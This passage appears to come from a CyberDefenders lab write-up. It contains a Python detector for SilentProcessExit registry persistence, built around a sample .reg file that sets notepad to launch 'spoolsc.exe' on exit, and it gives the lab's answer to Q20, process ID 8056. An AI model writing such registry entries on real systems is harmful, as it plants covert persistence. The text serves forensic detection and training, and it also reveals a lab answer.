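SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="C:\\PLACEHOLDER_PATH\\spoolsc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe]
"DisableExceptionChainValidation"=dword:00000000
"""


def parse_reg(text):
    """Minimal .reg (REGEDIT5) parser returning {key_path: {value_name: value}}.
    Handles dword: and quoted strings; hex(...) blobs and line continuations are kept as raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"'):
            name, _, val = line.partition("=")
            name = name.strip('"')
            if val.startswith("dword:"):
                keys[current][name] = int(val[len("dword:"):], 16)
            elif len(val) >= 2 and val.startswith('"') and val.endswith('"'):
                # .reg escapes backslashes and quotes inside string values
                keys[current][name] = val[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            else:
                keys[current][name] = val
    return keys


def find_silent_exit_persistence(keys):
    """Each SilentProcessExit entry with a MonitorProcess, paired with its IFEO GlobalFlag.
    'armed' is True only when both the GlobalFlag bit and the ReportingMode launch bit are set."""
    lower = {k.lower(): v for k, v in keys.items()}
    findings = []
    for key, values in keys.items():
        if not key.lower().startswith(SPE.lower() + "\\"):
            continue
        image = key.rsplit("\\", 1)[1]
        monitor = values.get("MonitorProcess")
        if not monitor:
            continue
        ifeo = lower.get((IFEO + "\\" + image).lower(), {})
        mode = values.get("ReportingMode", 0)
        flag_set = bool(ifeo.get("GlobalFlag", 0) & FLG_MONITOR_SILENT_PROCESS_EXIT)
        findings.append({
            "image": image,
            "monitor_process": monitor,
            "reporting_mode": mode,
            "armed": flag_set and bool(mode & LAUNCH_MONITOR_PROCESS),
        })
    return findings


if __name__ == "__main__":
    for f in find_silent_exit_persistence(parse_reg(SAMPLE_REG)):
        print(f)
```

On a live host the same pairing is done by exporting both keys with `reg export` and feeding the files to parse_reg; an entry with a MonitorProcess but no GlobalFlag bit is still worth recording, since it may be a half-finished or half-cleaned persistence attempt.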

Q20: The persistence binary executed once on the compromised system. What was the process ID of this execution?

Since we know the persistence binary "spoolsc.exe", getting the process ID is easy, as we already investigated the Windows Defender log above and got the process ID there. But let's get it another way, using Chainsaw:


8056

Thanks For Reading, Hope you enjoyed❤️


Article source: https://infosecwriteups.com/lfi-escalation-lab-writeup-cyberdefenders-10ddfb745ced?source=rss----7b722bfd1b8d---4